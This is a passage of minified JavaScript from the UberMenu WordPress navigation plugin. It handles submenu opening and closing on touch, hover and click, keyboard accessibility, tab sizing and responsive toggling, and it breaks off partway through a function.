    aria_expanded: "off",
    aria_hidden: "off",
    aria_controls: "",
    aria_responsive_toggle: "off",
    icon_tag: "i",
    theme_locations: {primary: "Primary Menu"},
};

'use strict';
var uber_supports = function() {
    var d = document.createElement("div"),
        f = ["Khtml", "Ms", "O", "Moz", "Webkit"];
    return function(h) {
        var l = f.length;
        if (h in d.style) return !0;
        for (h = h.replace(/^[a-z]/, function(d) {
                return d.toUpperCase()
            }); l--;)
            if (f[l] + h in d.style) return !0;
        return !1
    }
}();

function uber_op(d, f, h) {
    if (!ubermenu_data.hasOwnProperty(d)) return h;
    d = ubermenu_data[d];
    if (f.hasOwnProperty("datatype")) switch (f.datatype) {
        case "numeric":
            d = parseInt(d);
            break;
        case "boolean":
            d = "on" == d || 1 == d || "1" == d ? !0 : !1
    }
    return d
}(function(d, f) {
    var h = function(d, f, h) {
        var k;
        return function() {
            var l = this,
                n = arguments;
            k ? clearTimeout(k) : h && d.apply(l, n);
            k = setTimeout(function() {
                h || d.apply(l, n);
                k = null
            }, f || 100)
        }
    };
    jQuery.fn[f] = function(d) {
        return d ? this.bind("resize", h(d)) : this.trigger(f)
    }
})(jQuery, "ubersmartresize");
(function(d, f, h, l) {
    function k(a, c) {
        var b = this;
        this.element = a;
        this.$ubermenu = d(this.element);
        this.orientation = this.$ubermenu.hasClass("ubermenu-vertical") ? "v" : "h";
        this.settings = d.extend({}, r, c);
        this._defaults = r;
        this._name = "ubermenu";
        this.settings.responsive = this.$ubermenu.hasClass("ubermenu-responsive") ? !0 : !1;
        this.settings.debug && this.settings.debug_onscreen && (d("body").append('<div id="uber-onscreen-debug" style="color:#eee;z-index:10000;background:#222;position:fixed;left:0; bottom:0; width:100%; height:50%; padding:10px;overflow:scroll;"> '),
            this.debug_target = d("#uber-onscreen-debug"), this.debug_target.on("click", function() {
                100 > d(this).height() ? d(this).height("50%") : d(this).height("50px")
            }));
        this.log("-- START UBERMENU DEBUG --");
        this.suppress_clicks = this.events_disabled = !1;
        (this.touchenabled = "ontouchstart" in f || 0 < navigator.maxTouchPoints || 0 < navigator.msMaxTouchPoints) ? this.$ubermenu.addClass("ubermenu-touch"): this.$ubermenu.addClass("ubermenu-notouch");
        f.navigator.pointerEnabled ? (this.touchStart = "pointerdown", this.touchEnd = "pointerup",
            this.touchMove = "pointermove", this.suppress_clicks = !0) : f.navigator.msPointerEnabled ? (this.touchStart = "MSPointerDown", this.touchEnd = "MSPointerUp", this.touchMove = "MSPointerMove", this.suppress_clicks = !0) : (this.touchStart = "touchstart", this.touchEnd = "touchend", this.touchMove = "touchmove");
        this.toggleevent = "touchend" == this.touchEnd ? this.touchEnd + " click" : this.touchEnd;
        this.transitionend = "transitionend.ubermenu webkitTransitionEnd.ubermenu msTransitionEnd.ubermenu oTransitionEnd.ubermenu";
        (this.transitions =
            uber_supports("transition") && !this.$ubermenu.hasClass("ubermenu-transition-none")) || this.$ubermenu.addClass("ubermenu-no-transitions");
        a = navigator.userAgent.toLowerCase();
        this.log(a);
        this.allow_trigger_overrides = !0;
        this.noTouchEnd = !1;
        c = this.settings.android = /android/.test(a);
        var e = this.settings.windowsmobile = /iemobile/.test(a);
        if (c || e)
            if (c && !(/chrome/.test(a) || /firefox/.test(a) || /opera/.test(a)) || e) this.settings.touchOffClose = !1, this.disableTransitions(), c && !e && (this.$ubermenu.removeClass("ubermenu-trigger-hover_intent").removeClass("ubermenu-trigger-hover").addClass("ubermenu-trigger-click"),
                this.allow_trigger_overrides = this.settings.touchEvents = !1);
        e && (this.log("disable touchoff close and accessibility"), this.settings.touchOffClose = !1, this.settings.accessible = !1, this.settings.mouseEvents = !1);
        !/chrome/.test(a) && /safari/.test(a) && /version\/5/.test(a) && this.disableTransitions();
        var g = this.last_width = f.innerWidth,
            p = b.$ubermenu.find(".ubermenu-item-level-0.ubermenu-align-right");
        p.length && d(f).ubersmartresize(function() {
            g = f.innerWidth;
            b.last_width <= b.settings.breakpoint && g >= b.settings.breakpoint &&
                (p.hide(), p[0].offsetHeight, p.show());
            b.last_width = g
        });
        this.settings.clicktest && (this.touchEnd = "click");
        this.init()
    }
    var r = {
            breakpoint: uber_op("responsive_breakpoint", {
                datatype: "numeric"
            }, 959),
            touchEvents: !0,
            mouseEvents: !0,
            retractors: !0,
            touchOffClose: uber_op("touch_off_close", {
                datatype: "boolean"
            }, !0),
            submenuIndicatorCloseMobile: uber_op("submenu_indicator_close_mobile", {
                datatype: "boolean"
            }, !0),
            moveThreshold: 10,
            submenuAnimationDuration: 500,
            ignoreDummies: !0,
            clicktest: !1,
            windowstest: !1,
            debug: !1,
            debug_onscreen: !1,
            remove_conflicts: uber_op("remove_conflicts", {
                datatype: "boolean"
            }, !0),
            reposition_on_load: uber_op("reposition_on_load", {
                datatype: "boolean"
            }, !1),
            accessible: uber_op("accessible", {
                datatype: "boolean"
            }, !0),
            retractor_display_strategy: uber_op("retractor_display_strategy", {
                datatype: "string"
            }, "responsive"),
            intent_delay: uber_op("intent_delay", {
                datatype: "numeric"
            }, 300),
            intent_interval: uber_op("intent_interval", {
                datatype: "numeric"
            }, 100),
            intent_threshold: uber_op("intent_threshold", {
                datatype: "numeric"
            }, 300),
            scrollto_offset: uber_op("scrollto_offset", {
                datatype: "numeric"
            }, 0),
            scrollto_duration: uber_op("scrollto_duration", {
                datatype: "numeric"
            }, 1E3),
            collapse_after_scroll: uber_op("collapse_after_scroll", {
                datatype: "boolean"
            }, !0),
            aria_role_navigation: uber_op("aria_role_navigation", {
                datatype: "boolean"
            }, !1),
            aria_expanded: uber_op("aria_expanded", {
                datatype: "boolean"
            }, !1),
            aria_hidden: uber_op("aria_hidden", {
                datatype: "boolean"
            }, !1),
            aria_responsive_toggle: uber_op("aria_responsive_toggle", {
                datatype: "boolean"
            }, !1),
            icon_tag: uber_op("icon_tag", {
                    datatype: "string"
                },
                "i")
        },
        t, m, n, q;
    k.prototype = {
        init: function() {
            this.log("Initializing UberMenu");
            this.$ubermenu.removeClass("ubermenu-nojs");
            this.removeConflicts();
            this.initializeSubmenuToggleTouchEvents();
            this.initializeSubmenuToggleMouseEvents();
            this.initializeRetractors();
            this.initializeResponsiveToggle();
            this.initializeTouchoffClose();
            this.initializeTabs();
            this.initializeSubmenuPositioning();
            this.initializeSegmentCurrentStates();
            this.initializeAccessibilityOnTab();
            this.initializeAccessibilityStates();
            this.initializeImageLazyLoad()
        },
        removeConflicts: function() {
            this.settings.remove_conflicts && this.$ubermenu.find(".ubermenu-item, .ubermenu-target, .ubermenu-submenu").add(this.$ubermenu).removeAttr("style").unbind().off()
        },
        initializeAccessibilityStates: function() {
            this.settings.aria_role_navigation && this.$ubermenu.attr("role", "navigation")
        },
        initializeAccessibilityOnTab: function() {
            if (this.settings.accessible) {
                var a = this;
                d("body").on("keydown.ubermenu", function(c) {
                    9 == (c.keyCode || c.which) && (d("body").off("keydown.ubermenu"), a.initializeAccessibility())
                })
            }
        },
        initializeImageLazyLoad: function() {
            var a = this;
            d(".ubermenu-item-level-0").one("ubermenuopen", function() {
                d(this).find(".ubermenu-image-lazyload").each(function() {
                    d(this).data("srcset") && d(this).attr("srcset", d(this).data("srcset")).attr("sizes", d(this).data("sizes"));
                    d(this).attr("src", d(this).data("src")).removeClass("ubermenu-image-lazyload")
                });
                setTimeout(function() {
                    a.clearTabSizes();
                    a.sizeTabs()
                }, 300)
            })
        },
        initializeAccessibility: function() {
            var a = this;
            a.$current_focus = !1;
            a.mousedown = !1;
            a.$ubermenu.addClass("ubermenu-accessible");
            a.$ubermenu.on("focus", ".ubermenu-target, a, input, select, textarea", function() {
                if (!a.mousedown) {
                    var c = d(this);
                    a.$current_focus = c;
                    var b = c.parent(".ubermenu-item");
                    b.length && (b.is(".ubermenu-item-level-0") && a.closeAllSubmenus(), b.is(".ubermenu-has-submenu-drop") && setTimeout(function() {
                        c.is(":focus") && (b.siblings(".ubermenu-has-submenu-drop").each(function() {
                            a.closeSubmenu(d(this), "umac", a)
                        }), a.openSubmenu(b, "umac", a))
                    }, 500), c.on("blur.ubermenu", ".ubermenu-target, a, input, select, textarea", function(b) {
                        a.mousedown ||
                            (a.$current_focus = !1, d(this).off("blur.ubermenu"), setTimeout(function() {
                                a.$current_focus || a.closeAllSubmenus()
                            }, 500));
                        a.mousedown = !1
                    }))
                }
                a.mousedown = !1
            });
            a.$ubermenu.on("focusout", function() {
                setTimeout(function() {
                    d(h.activeElement).closest(a.$ubermenu).length || a.closeAllSubmenus()
                }, 10)
            });
            a.$ubermenu.find(".ubermenu-item-level-0").on("keydown", function(c) {
                switch (c.which) {
                    case 39:
                        a.closeAllSubmenus();
                        d(this).next().find(">.ubermenu-target").focus();
                        break;
                    case 37:
                        a.closeAllSubmenus();
                        jQuery(this).prev().find(">.ubermenu-target").focus();
                        break;
                    case 27:
                        a.closeAllSubmenus()
                }
            });
            a.$ubermenu.on("mousedown", function(c) {
                a.mousedown = !0;
                setTimeout(function() {
                    a.mousedown = !1
                }, 100)
            })
        },
        initializeSubmenuPositioning: function() {
            var a = this;
            a.positionSubmenus();
            d(f).ubersmartresize(function() {
                a.positionSubmenus()
            });
            if (this.settings.reposition_on_load) d(f).on("load", function() {
                a.positionSubmenus()
            })
        },
        initializeSubmenuToggleTouchEvents: function() {
            if (this.settings.touchEvents) {
                var a = this;
                this.$ubermenu.on(this.touchStart, ".ubermenu-target:not(.shiftnav-toggle)",
                    function(c) {
                        a.handleTouchInteraction(c, this, a)
                    });
                this.$ubermenu.on("click", ".ubermenu-has-submenu-drop > .ubermenu-target, .ubermenu-tab.ubermenu-item-has-children > .ubermenu-target", function(c) {
                    a.handleClicks(c, this, a)
                })
            }
        },
        initializeSubmenuToggleMouseEvents: function(a) {
            a = a || this;
            if (a.settings.mouseEvents && !a.settings.clicktest && !a.settings.windowstest) {
                a.log("initializeSubmenuToggleMouseEvents");
                var c = "hover";
                a.$ubermenu.hasClass("ubermenu-trigger-click") ? c = "click" : a.$ubermenu.hasClass("ubermenu-trigger-hover_intent") &&
                    (c = "hover_intent");
                "click" == c ? this.suppress_clicks || (this.$ubermenu.on("click.ubermenu-submenu-toggle", ".ubermenu-item.ubermenu-has-submenu-drop:not([data-ubermenu-trigger]) > .ubermenu-target", function(b) {
                    a.handleMouseClick(b, this, a)
                }), this.$ubermenu.on("click.ubermenu-click-target", ".ubermenu-item:not(.ubermenu-has-submenu-drop):not([data-ubermenu-trigger]) > .ubermenu-target", function(b) {
                    a.handleLink(b, this, a)
                })) : "hover_intent" == c ? (this.$ubermenu.on("mouseenter.mouse_intent", ".ubermenu-item.ubermenu-has-submenu-drop:not([data-ubermenu-trigger])",
                    function(b) {
                        a.handleMouseIntent(b, this, a)
                    }), this.$ubermenu.on("click.ubermenu-click-target", ".ubermenu-item:not([data-ubermenu-trigger]) > .ubermenu-target", function(b) {
                    a.handleLink(b, this, a)
                })) : (this.$ubermenu.on("mouseenter.ubermenu-submenu-toggle", ".ubermenu-item.ubermenu-has-submenu-drop:not([data-ubermenu-trigger]) > .ubermenu-target", function(b) {
                    a.handleMouseover(b, this, a)
                }), this.$ubermenu.on("click.ubermenu-click-target", ".ubermenu-item:not([data-ubermenu-trigger]) > .ubermenu-target", function(b) {
                    a.handleLink(b,
                        this, a)
                }));
                if (this.allow_trigger_overrides) a.$ubermenu.find(".ubermenu-item[data-ubermenu-trigger]").each(function() {
                    var b = d(this);
                    c = b.data("ubermenu-trigger");
                    if ("click" == c) {
                        if (!this.suppress_clicks) b.on("click.ubermenu-submenu-toggle", ".ubermenu-target", function(b) {
                            a.handleMouseClick(b, this, a)
                        })
                    } else if ("hover_intent" == c) b.on("mouseenter.mouse_intent", function(b) {
                        a.handleMouseIntent(b, this, a)
                    });
                    else b.on("mouseenter.ubermenu-submenu-toggle", ".ubermenu-target", function(b) {
                        a.handleMouseover(b, this,
                            a)
                    })
                });
                else a.$ubermenu.find(".ubermenu-tab").on("click.ubermenu-submenu-toggle", ".ubermenu-target", function(b) {
                    a.handleMouseClick(b, this, a)
                })
            }
        },
        disableSubmenuToggleMouseEvents: function() {
            this.log("disableSubmenuToggleMouseEvents");
            this.events_disabled = !0
        },
        reenableSubmenuToggleMouseEvents: function(a) {
            a = a || this;
            a.log("reenableSubmenuToggleMouseEvents");
            a.events_disabled = !1
        },
        initializeRetractors: function() {
            if (this.settings.retractors) {
                var a = this;
                this.$ubermenu.on("click", ".ubermenu-retractor", function(b) {
                    a.handleSubmenuRetractorEnd(b,
                        this, a)
                });
                if (this.settings.touchEvents) this.$ubermenu.on(this.touchStart, ".ubermenu-retractor", function(b) {
                    a.handleSubmenuRetractorStart(b, this, a)
                });
                this.touchenabled || "touch" != a.settings.retractor_display_strategy || (this.$ubermenu.find(".ubermenu-retractor-mobile").remove(), this.$ubermenu.find(".ubermenu-submenu-retractor-top").removeClass("ubermenu-submenu-retractor-top").removeClass("ubermenu-submenu-retractor-top-2"));
                if (this.settings.submenuIndicatorCloseMobile) {
                    var c = this.$ubermenu.find(".ubermenu-has-submenu-drop > .ubermenu-target").append('<span class="ubermenu-sub-indicator-close"><' +
                        a.settings.icon_tag + ' class="fas fa-times"></' + a.settings.icon_tag + "></span>").find(">.ubermenu-sub-indicator-close");
                    c.on("click", function(b) {
                        b.preventDefault();
                        b.stopPropagation();
                        a.closeSubmenuInstantly(d(this).closest(".ubermenu-item"), "toggleUberMenuSubmenuClosed", a);
                        return !1
                    });
                    if (this.settings.touchEvents) c.on(this.touchStart, function(b) {
                        b.preventDefault();
                        b.stopPropagation();
                        a.closeSubmenuInstantly(d(this).closest(".ubermenu-item"), "toggleUberMenuSubmenuClosed", a);
                        return !1
                    })
                }
            }
        },
        initializeResponsiveToggle: function() {
            var a =
                this,
                c = ".ubermenu-responsive-toggle[data-ubermenu-target=" + a.$ubermenu.attr("id") + "], .ubermenu-responsive-toggle[data-ubermenu-target=_any_]";
            a.log("initializeResponsiveToggle " + this.toggleevent);
            if (a.settings.aria_responsive_toggle) {
                var b = f.innerWidth > a.settings.breakpoint;
                d(c).attr("aria-hidden", b);
                d(f).ubersmartresize(function() {
                    d(c).attr("aria-hidden", f.innerWidth > a.settings.breakpoint)
                })
            }
            d(h).on(this.toggleevent, c, function(b) {
                a.handleResponsiveToggle(b, this, a)
            })
        },
        initializeTouchoffClose: function() {
            if (this.settings.touchOffClose) {
                var a =
                    this;
                d(h).on(this.touchStart + ".ubermenu_touchoff", function(c) {
                    a.handleTouchoffCloseStart(c, this, a)
                });
                d(h).on(this.touchEnd + ".ubermenu_touchoff", function(c) {
                    a.handleTouchoffClose(c, this, "touch", a)
                });
                if (!this.suppress_clicks) d(h).on("mouseup.ubermenu_clickoff", function(c) {
                    a.handleTouchoffClose(c, this, "click", a)
                })
            }
        },
        initializeTabs: function() {
            var a = this,
                c = a.settings.responsive && f.innerWidth <= a.settings.breakpoint ? !0 : !1;
            a.$tab_blocks = a.$ubermenu.find(".ubermenu-tabs");
            a.$tab_blocks = d(a.$tab_blocks.get().reverse());
            d(f).on("load", function() {
                a.sizeTabs()
            });
            a.windowwidth = f.innerWidth;
            d(f).ubersmartresize(function() {
                a.oldwindowwidth = a.windowwidth;
                a.windowwidth = f.innerWidth;
                a.windowwidth != a.oldwindowwidth && (a.clearTabSizes(a), a.sizeTabs(), a.checkActiveTabs(a))
            });
            a.$ubermenu.find(".ubermenu-item-level-0.ubermenu-has-submenu-drop").on("ubermenuopen.sizetabs", function() {
                d(this).off("ubermenuopen.sizetabs");
                a.sizeTabs()
            });
            a.$ubermenu.find(".ubermenu-tabs.ubermenu-tabs-dynamic-sizing").on("ubermenuopen", "> .ubermenu-tabs-group > .ubermenu-tab",
                function() {
                    a.sizeTabsDynamic(d(this).closest(".ubermenu-tabs"))
                });
            c || a.initializeActiveTab(a)
        },
        checkActiveTabs: function(a) {
            f.innerWidth <= a.settings.breakpoint ? a.$tab_blocks.find(".ubermenu-tab.ubermenu-active").removeClass("ubermenu-active") : a.initializeActiveTab(a)
        },
        initializeActiveTab: function(a) {
            a.$tab_blocks.each(function() {
                var c = d(this).hasClass("ubermenu-tabs-show-default"),
                    b = d(this).hasClass("ubermenu-tabs-show-current"),
                    e = d(this).find("> .ubermenu-tabs-group"),
                    g = !1;
                b && (e.find(".ubermenu-current-menu-item").parentsUntil(e,
                    ".ubermenu-tab:not( .ubermenu-nocurrent )").addClass("ubermenu-current-menu-ancestor"), b = e.find("> .ubermenu-tab.ubermenu-current-menu-ancestor, > .ubermenu-tab.ubermenu-current-menu-item"), b.length && (a.openSubmenu(b.first(), "tab current", a), g = !0));
                c && !g && 0 === e.find("> .ubermenu-tab.ubermenu-active").length && a.openSubmenu(e.find("> .ubermenu-tab").first(), "tab default", a)
            })
        },
        clearTabSizes: function(a) {
            (a || this).$ubermenu.find(".ubermenu-submenu , .ubermenu-tabs , .ubermenu-tab-content-panel , .ubermenu-tabs-group").css("min-height",
                "")
        },
        sizeTabs: function() {
            var a = this,
                c = a.settings.responsive && f.innerWidth <= a.settings.breakpoint ? !0 : !1;
            c || (a.initializeActiveTab(a), a.$tab_blocks.each(function() {
                var b = !1;
                !d(this).hasClass("ubermenu-tab-layout-top") && !d(this).hasClass("ubermenu-tab-layout-bottom") || c || (b = !0);
                d(this).data("um-stacked", b);
                var e = 0,
                    b = c ? d(this).parentsUntil(".ubermenu").add(d(this).parents(".ubermenu")) : d(this).parentsUntil(".ubermenu-item-level-0");
                b.addClass("ubermenu-test-dimensions");
                var g;
                d(this).find(" > .ubermenu-tabs-group > .ubermenu-tab > .ubermenu-tab-content-panel").each(function() {
                    d(this).addClass("ubermenu-test-dimensions");
                    g = d(this).outerHeight();
                    g > e && (e = g);
                    d(this).data("um-oh", g);
                    d(this).removeClass("ubermenu-test-dimensions")
                });
                d(this).data("um-max-panel-height", e);
                d(this).hasClass("ubermenu-tabs-dynamic-sizing") ? a.sizeTabsDynamic(d(this), !1) : a.sizeTabsMax(d(this));
                b.removeClass("ubermenu-test-dimensions")
            }))
        },
        sizeTabsMax: function(a) {
            var c = a.data("um-max-panel-height"),
                b = a.data("um-stacked"),
                d = a.find("> .ubermenu-tabs-group");
            b ? a.css("min-height", c + d.outerHeight()) : (d.outerHeight() > c && (c = a.outerHeight()), d.css("min-height",
                c));
            d.find("> .ubermenu-tab > .ubermenu-tab-content-panel").css("min-height", c)
        },
        sizeTabsDynamic: function(a, c) {
            c === l && (c = !0);
            c && (c = a.hasClass("ubermenu-tabs-dynamic-sizing-animate"));
            if (!(this.settings.responsive && f.innerWidth <= this.settings.breakpoint)) {
                var b = a.data("um-stacked"),
                    d = a.find("> .ubermenu-tabs-group"),
                    g = d.outerHeight();
                d.css("min-height", "0");
                var p = d.find("> .ubermenu-active > .ubermenu-tab-content-panel"),
                    k = p.data("um-oh"),
                    k = d.outerHeight() > k ? a.outerHeight() : k;
                b ? c ? a.stop().animate({
                    "min-height": k +
                        d.outerHeight()
                }, 300, "swing", function() {
                    p.css("overflow", "auto")
                }) : a.css("min-height", k + d.outerHeight()) : c ? (d.css("min-height", g), d.stop().animate({
                    "min-height": k
                }, 300, "swing", function() {
                    p.css("overflow", "auto")
                })) : d.css("min-height", k)
            }
        },
        initializeSegmentCurrentStates: function() {
            this.$ubermenu.find(".ubermenu-current-menu-item").first().parents(".ubermenu-item:not( .ubermenu-nocurrent )").addClass("ubermenu-current-menu-ancestor")
        },
        disableTransitions: function() {
            this.transitions = !1;
            this.$ubermenu.removeClass("ubermenu-transition-slide").removeClass("ubermenu-transition-fade").removeClass("ubermenu-transition-shift").addClass("ubermenu-no-transitions").addClass("ubermenu-transition-none")
        },
        handleClicks: function(a, c, b) {
            d(c).data("ubermenu-killClick") && (a.preventDefault(), b.log("killed click after touchend ", a))
        },
        handleTouchInteraction: function(a, c, b) {
            a.stopPropagation();
            0 <= a.type.indexOf("pointer") && b.disableTransitions();
            c = d(c);
            c.parent().off("mouseleave.mouse_intent_none");
            b.log("touchstart " + a.type + " " + c.text(), a);
            c.on(b.touchEnd, function(a) {
                b.handleTap(a, this, b)
            });
            c.on(b.touchMove, function(a) {
                b.preventInteractionOnScroll(a, this, b)
            });
            a.originalEvent.touches ? (c.data("ubermenu-startX",
                a.originalEvent.touches[0].clientX), c.data("ubermenu-startY", a.originalEvent.touches[0].clientY)) : a.originalEvent.clientY && (c.offset(), c.data("ubermenu-startX", a.originalEvent.clientX), c.data("ubermenu-startY", a.originalEvent.clientY))
        },
        preventInteractionOnScroll: function(a, c, b) {
            b.log("touchmove interaction " + a.type, a);
            c = d(c);
            if (a.originalEvent.touches) Math.abs(a.originalEvent.touches[0].clientX - c.data("ubermenu-startX")) > b.settings.moveThreshold || Math.abs(a.originalEvent.touches[0].clientY - c.data("ubermenu-startY")) >
                b.settings.moveThreshold ? (b.log("Preventing interaction on scroll, reset handlers (standard)"), b.resetHandlers(c, "preventScroll touches", b)) : b.log("diff = " + Math.abs(a.originalEvent.touches[0].clientY - c.data("ubermenu-startY")));
            else if (a.originalEvent.clientY) {
                var e = c.data(e);
                Math.abs(a.originalEvent.clientX - c.data("ubermenu-startX")) > b.settings.moveThreshold || Math.abs(a.originalEvent.clientY - c.data("ubermenu-startY")) > b.settings.moveThreshold ? (b.log("Preventing interaction on scroll, reset handlers (standard)"),
                    b.resetHandlers(c, "preventScroll client", b)) : b.log("diff = " + a.originalEvent.clientY + " - " + c.data("ubermenu-startY") + " = " + Math.abs(a.originalEvent.clientY - c.data("ubermenu-startY")))
            } else b.log("no touch points found!")
        },
        handleTap: function(a, c, b) {
            a.preventDefault();
            a.stopPropagation();
            var e = d(c);
            if (e.data("ubermenu-killTouch")) b.log("kill tap"), a.preventDefault(), a.stopPropagation();
            else {
                var g = e.parent();
                b.log("handleTap [" + e.text() + "]", a.type);
                e.data("ubermenu-killClick", !0);
                e.data("ubermenu-killHover",
                    !0);
                setTimeout(function() {
                    e.data("ubermenu-killClick", !1).data("ubermenu-killHover", !1)
                }, 1E3);
                b.closeSubmenuInstantly(g.siblings(".ubermenu-active"));
                g.hasClass("ubermenu-has-submenu-drop") ? g.hasClass("ubermenu-active") ? ((!g.hasClass("ubermenu-tab") || f.innerWidth <= b.settings.breakpoint) && b.closeSubmenu(g, "toggleUberMenuActive", b), b.handleLink(a, c, b, !0)) : b.openSubmenu(g, "toggle", b) : b.handleLink(a, c, b, !0)
            }
            e.data("ubermenu-killTouch", !1);
            b.resetHandlers(e, "handleTap", b)
        },
        handleLink: function(a, c, b, e) {
            e =
                e || !1;
            b.log("handleLink");
            var g = d(c);
            if (g.is("a")) {
                var k = g.attr("href"),
                    h = g.data("ubermenu-scrolltarget");
                if (h) {
                    c = d(h).first();
                    if (0 < c.length) {
                        a.preventDefault();
                        g.trigger("ubermenuscrollto");
                        a = g.parent(".ubermenu-item");
                        a.addClass("ubermenu-current-menu-item");
                        a.siblings().removeClass("ubermenu-current-menu-item").removeClass("ubermenu-current-menu-parent").removeClass("uberemnu-current-menu-ancestor");
                        var l = !1;
                        d("html,body").animate({
                                scrollTop: c.offset().top - b.settings.scrollto_offset
                            }, b.settings.scrollto_duration,
                            "swing",
                            function() {
                                l || (b.closeSubmenu(g.closest(".ubermenu-item-level-0"), "handeLink", b), b.settings.collapse_after_scroll && !b.$ubermenu.hasClass("ubermenu-responsive-nocollapse") && b.toggleMenuCollapse("toggle", !1, b), g.trigger("ubermenuscrollto_complete"), l = !0)
                            });
                        return !1
                    }
                    k && -1 == k.indexOf("#") && (-1 == h.indexOf("#") && (h = "#" + h), f.location = k + h, a.preventDefault())
                }
                k ? e && a.isDefaultPrevented() && (b.log("default prevented, follow link"), "_blank" == g.attr("target") ? f.open(k, "_blank") : f.location = k) : a.preventDefault()
            }
        },
        handleMouseClick: function(a, c, b) {
            b.log("handleMouseClick", a);
            var e = d(c);
            if (e.data("ubermenu-killClick")) b.log("handleMouseClick: killClick");
            else {
                var g = e.parent(".ubermenu-item");
                g.length && (g.hasClass("ubermenu-active") ? (e.is("a") && b.handleLink(a, c, b), g.hasClass("ubermenu-tab") || b.closeSubmenu(g, "retract")) : g.hasClass("ubermenu-has-submenu-drop") && (a.preventDefault(), b.closeSubmenuInstantly(g.siblings(".ubermenu-active")), b.openSubmenu(g, "click", b)))
            }
        },
        handleMouseIntent: function(a, c, b) {
            b.log("handleMouseIntent");
            var e = d(c);
            e.data("mouse_intent_timer") && e.data("mouse_intent_timer", clearTimeout(e.data("mouse_intent_timer")));
            var g = e.find(".ubermenu-target");
            g.data("ubermenu-killHover") ? (b.log("killHover MouseIntent"), a.preventDefault(), a.stopPropagation()) : (n = a.pageX, q = a.pageY, e.on("mousemove.mouse_intent", b.trackMouse), e.data("mouse_intent_timer", setTimeout(function() {
                b.compare(a, e, b.handleMouseIntentSuccess, b)
            }, b.settings.intent_interval)), e.on("mouseleave.mouse_intent_none", function() {
                d(this).data("mouse_intent_timer",
                    clearTimeout(d(this).data("mouse_intent_timer")));
                e.data("mouse_intent_state", 0);
                e.off("mouseleave.mouse_intent_none");
                g.data("ubermenu-killHover") ? (b.log("killHover MouseIntent_Cancel"), a.preventDefault(), a.stopPropagation()) : b.closeSubmenu(e, "mouse_intent_cancel", b)
            }))
        },
        handleMouseIntentSuccess: function(a, c, b) {
            b.log("handleMouseIntentSuccess");
            c.off("mouseleave.mouse_intent_none");
            var d = c.find(".ubermenu-target");
            if (d.data("ubermenu-killHover")) b.log("Kill hover on IntentSuccess"), a.preventDefault(),
                a.stopPropagation();
            else if (d.data("ubermenu-killHover", !1), b.triggerSubmenu(a, c, b), !c.hasClass("ubermenu-tab") || f.innerWidth <= b.settings.breakpoint) c.on("mouseleave.mouse_intent", function(a) {
                b.handleMouseIntentLeave(a, this, b)
            })
        },
        handleMouseIntentLeave: function(a, c, b) {
            var e = d(c);
            e.data("mouse_intent_timer") && e.data("mouse_intent_timer", clearTimeout(e.data("mouse_intent_timer")));
            e.off("mousemove.mouse_intent", b.trackMouse);
            1 == e.data("mouse_intent_state") && e.data("mouse_intent_timer", setTimeout(function() {
                b.delayMouseLeave(a,
                    e, b.handleMouseIntentLeaveSuccess, b)
            }, b.settings.intent_delay))
        },
        handleMouseIntentLeaveSuccess: function(a, c, b) {
            c.off("mouseleave.mouse_intent");
            c.find("> .ubermenu-target").data("ubermenu-killHover") || b.closeSubmenu(c, "mouse_intent_leave", b)
        },
        delayMouseLeave: function(a, c, b, d) {
            c.data("mouse_intent_timer", clearTimeout(c.data("mouse_intent_timer")));
            c.data("mouse_intent_state", 0);
            return b.apply(c, [a, c, d])
        },
        trackMouse: function(a) {
            t = a.pageX;
            m = a.pageY
        },
        compare: function(a, c, b, d) {
            c.data("mouse_intent_timer",
                clearTimeout(c.data("mouse_intent_timer")));
            if (Math.abs(n - t) + Math.abs(q - m) < d.settings.intent_threshold) return c.off("mousemove.mouse_intent", d.track), c.data("mouse_intent_state", 1), b.apply(c, [a, c, d]);
            n = t;
            q = m;
            c.data("mouse_intent_timer", setTimeout(function() {
                d.compare(a, c, b, d)
            }, d.settings.intent_interval))
        },
        triggerSubmenu: function(a, c, b) {
            b.closeSubmenuInstantly(c.siblings(".ubermenu-active, .ubermenu-in-transition"));
            b.openSubmenu(c, "mouseenter", b)
        },
        handleMouseover: function(a, c, b) {
            if (!b.events_disabled) {
                var e =
                    d(c);
                e.data("ubermenu-killTouch", !0);
                setTimeout(function() {
                    e.data("ubermenu-killTouch", !1)
                }, 1E3);
                b.log("handleMouseenter, add mouseleave", a);
                c = e.parent(".ubermenu-item");
                if (c.length && !c.hasClass("ubermenu-active") && (b.triggerSubmenu(a, c, b), !c.hasClass("ubermenu-tab") || f.innerWidth <= b.settings.breakpoint)) c.on("mouseleave.ubermenu-submenu-toggle", function(a) {
                    b.handleMouseleave(a, this, b)
                })
            }
        },
        handleMouseleave: function(a, c, b) {
            b.log("handleMouseleave, remove mouseleave", a);
            d(c).off("mouseleave.ubermenu-submenu-toggle");
            b.closeSubmenu(d(c), "mouseout")
        },
        handleSubmenuRetractorStart: function(a, c, b) {
            a.preventDefault();
            a.stopPropagation();
            d(c).on(b.touchEnd, function(a) {
                b.handleSubmenuRetractorEnd(a, this, b)
            });
            b.log("handleSubmenuRetractorStart " + d(c).text())
        },
        handleSubmenuRetractorEnd: function(a, c, b) {
            a.preventDefault();
            a.stopPropagation();
            a = d(c).closest(".ubermenu-item");
            b.closeSubmenu(a, "handleSubmenuRetractor");
            d(c).off(b.touchEnd);
            b.log("handleSubmenuRetractorEnd " + a.find("> .ubermenu-target").text());
            return !1
        },
        handleResponsiveToggle: function(a,
            c, b) {
            b.log("handleResponsiveToggle " + a.type, a);
            a.preventDefault();
            a.stopPropagation();
            if ("touchend" == a.type) b.$ubermenu.data("ubermenu-prevent-click", !0), setTimeout(function() {
                b.$ubermenu.data("ubermenu-prevent-click", !1)
            }, 500);
            else if ("click" == a.type && b.$ubermenu.data("ubermenu-prevent-click")) {
                b.$ubermenu.data("ubermenu-prevent-click", !1);
                return
            }
            b.toggleMenuCollapse("toggle", c, b)
        },
        handleTouchoffCloseStart: function(a, c, b) {
            b.touchoffclosestart = d(f).scrollTop()
        },
        handleTouchoffClose: function(a, c, b,
            e) {
            d(a.target).closest(".ubermenu").length || "click" != b && e.touchoffclosestart != d(f).scrollTop() || (e.log("touchoff close ", a), e.closeAllSubmenus() && (e.disableSubmenuToggleMouseEvents(), f.setTimeout(function() {
                e.reenableSubmenuToggleMouseEvents(e)
            }, e.settings.submenuAnimationDuration)))
        },
        toggleMenuCollapse: function(a, c, b) {
            b = b || this;
            c = c || ".ubermenu-resposive-toggle";
            c = "object" == typeof c ? d(c) : d(c + '[data-ubermenu-target="' + b.$ubermenu.attr("id") + '"]');
            a = a || "toggle";
